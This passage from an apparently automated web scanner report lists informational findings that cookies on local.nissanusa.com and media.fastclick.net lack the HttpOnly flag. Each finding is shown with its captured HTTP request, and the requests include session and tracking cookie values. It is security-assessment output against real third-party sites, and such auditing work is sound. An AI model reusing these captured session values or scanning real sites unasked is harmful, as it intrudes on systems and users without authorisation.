11.421. http://local.nissanusa.com/minneapolis-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/minneapolis-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localZIP=55401; expires=Sat, 05-Feb-2011 04:52:05 GMT; path=/
localDMA=minneapolis-area; expires=Sat, 05-Feb-2011 04:52:05 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /minneapolis-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

11.422. http://local.nissanusa.com/nashville-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/nashville-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localZIP=37201; expires=Sat, 05-Feb-2011 04:56:10 GMT; path=/
localDMA=nashville-area; expires=Sat, 05-Feb-2011 04:56:10 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /nashville-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

11.423. http://local.nissanusa.com/new-orleans-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/new-orleans-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localZIP=70112; expires=Sat, 05-Feb-2011 04:53:37 GMT; path=/
localDMA=new-orleans-area; expires=Sat, 05-Feb-2011 04:53:37 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /new-orleans-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

11.424. http://local.nissanusa.com/new-york-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/new-york-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localZIP=10001; expires=Sat, 05-Feb-2011 04:52:19 GMT; path=/
localDMA=new-york-area; expires=Sat, 05-Feb-2011 04:52:19 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /new-york-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

11.425. http://local.nissanusa.com/norfolk-portsmouth-newport-news-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/norfolk-portsmouth-newport-news-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localZIP=23501; expires=Sat, 05-Feb-2011 04:56:07 GMT; path=/
localDMA=norfolk-portsmouth-newport-news-area; expires=Sat, 05-Feb-2011 04:56:07 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /norfolk-portsmouth-newport-news-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

11.426. http://local.nissanusa.com/oklahoma-city-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/oklahoma-city-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localZIP=73101; expires=Sat, 05-Feb-2011 04:54:39 GMT; path=/
localDMA=oklahoma-city-area; expires=Sat, 05-Feb-2011 04:54:39 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /oklahoma-city-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

11.427. http://local.nissanusa.com/orlando-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/orlando-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localZIP=32801; expires=Sat, 05-Feb-2011 04:55:27 GMT; path=/
localDMA=orlando-area; expires=Sat, 05-Feb-2011 04:55:27 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /orlando-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

11.428. http://local.nissanusa.com/philadelphia-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/philadelphia-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localZIP=19101; expires=Sat, 05-Feb-2011 04:52:32 GMT; path=/
localDMA=philadelphia-area; expires=Sat, 05-Feb-2011 04:52:32 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /philadelphia-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

11.429. http://local.nissanusa.com/phoenix-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/phoenix-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localZIP=85001; expires=Sat, 05-Feb-2011 04:56:47 GMT; path=/
localDMA=phoenix-area; expires=Sat, 05-Feb-2011 04:56:47 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /phoenix-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

11.430. http://local.nissanusa.com/pittsburgh-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/pittsburgh-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localZIP=15201; expires=Sat, 05-Feb-2011 04:51:59 GMT; path=/
localDMA=pittsburgh-area; expires=Sat, 05-Feb-2011 04:51:59 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pittsburgh-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

11.431. http://local.nissanusa.com/portland-or-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/portland-or-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localZIP=97201; expires=Sat, 05-Feb-2011 04:57:39 GMT; path=/
localDMA=portland-or-area; expires=Sat, 05-Feb-2011 04:57:39 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /portland-or-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

11.432. http://local.nissanusa.com/providence-new-bedford-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/providence-new-bedford-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localZIP=02901; expires=Sat, 05-Feb-2011 04:53:11 GMT; path=/
localDMA=providence-new-bedford-area; expires=Sat, 05-Feb-2011 04:53:11 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /providence-new-bedford-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

11.433. http://local.nissanusa.com/sacramento-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/sacramento-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localZIP=95814; expires=Sat, 05-Feb-2011 04:57:22 GMT; path=/
localDMA=sacramento-area; expires=Sat, 05-Feb-2011 04:57:22 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sacramento-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

11.434. http://local.nissanusa.com/salt-lake-city-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/salt-lake-city-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localZIP=84101; expires=Sat, 05-Feb-2011 04:55:25 GMT; path=/
localDMA=salt-lake-city-area; expires=Sat, 05-Feb-2011 04:55:25 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /salt-lake-city-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

11.435. http://local.nissanusa.com/san-antonio-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/san-antonio-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localZIP=78201; expires=Sat, 05-Feb-2011 04:53:34 GMT; path=/
localDMA=san-antonio-area; expires=Sat, 05-Feb-2011 04:53:34 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /san-antonio-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

11.436. http://local.nissanusa.com/san-diego-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/san-diego-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localZIP=92101; expires=Sat, 05-Feb-2011 04:56:59 GMT; path=/
localDMA=san-diego-area; expires=Sat, 05-Feb-2011 04:56:59 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /san-diego-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

11.437. http://local.nissanusa.com/san-francisco-oakland-san-jose-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/san-francisco-oakland-san-jose-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localZIP=94101; expires=Sat, 05-Feb-2011 04:56:51 GMT; path=/
localDMA=san-francisco-oakland-san-jose-area; expires=Sat, 05-Feb-2011 04:56:51 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /san-francisco-oakland-san-jose-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

11.438. http://local.nissanusa.com/seattle-tacoma-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/seattle-tacoma-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

downScroll=deleted; expires=Fri, 29-Jan-2010 04:57:23 GMT
localZIP=98101; expires=Sat, 05-Feb-2011 04:57:24 GMT; path=/
localDMA=seattle-tacoma-area; expires=Sat, 05-Feb-2011 04:57:24 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /seattle-tacoma-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

11.439. http://local.nissanusa.com/st-louis-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/st-louis-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localZIP=63101; expires=Sat, 05-Feb-2011 04:52:04 GMT; path=/
localDMA=st-louis-area; expires=Sat, 05-Feb-2011 04:52:04 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /st-louis-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

11.440. http://local.nissanusa.com/tampa-st-petersburg-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/tampa-st-petersburg-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localZIP=33601; expires=Sat, 05-Feb-2011 04:55:27 GMT; path=/
localDMA=tampa-st-petersburg-area; expires=Sat, 05-Feb-2011 04:55:27 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tampa-st-petersburg-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

11.441. http://local.nissanusa.com/washington-dc-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/washington-dc-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localZIP=20001; expires=Sat, 05-Feb-2011 04:52:34 GMT; path=/
localDMA=washington-dc-area; expires=Sat, 05-Feb-2011 04:52:34 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /washington-dc-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

11.442. http://local.nissanusa.com/wilkes-barre-scranton-pa-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/wilkes-barre-scranton-pa-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localZIP=18701; expires=Sat, 05-Feb-2011 04:53:14 GMT; path=/
localDMA=wilkes-barre-scranton-pa-area; expires=Sat, 05-Feb-2011 04:53:14 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /wilkes-barre-scranton-pa-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

11.443. http://local.nissanusa.com/zip.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/zip.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

downScroll=deleted; expires=Fri, 29-Jan-2010 04:51:50 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /zip.aspx?regionalZipCode=null&vehicle=versa-hatchback&dcp=zmm.50658498.&dcc=39942763.226884546\ HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:51:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:51:51 GMT
Content-Length: 15973
Connection: close
Set-Cookie: downScroll=deleted; expires=Fri, 29-Jan-2010 04:51:50 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...

11.444. http://media.fastclick.net/w/click.here previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://media.fastclick.net
Path:	/w/click.here

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

srb=BAEAAAABIAMDPnJDTSAGYAsCLywEIAmACwAGIAcDAAAAAA==; domain=.fastclick.net; path=/; expires=Mon, 31-Jan-2011 05:00:38 GMT
oatmeal=10070:256698:477674:54816:0:1295977917:3|10489:276818:522556:54393:0:1296277238:0|; domain=.fastclick.net; path=/; expires=Mon, 28-Feb-2011 05:00:38 GMT
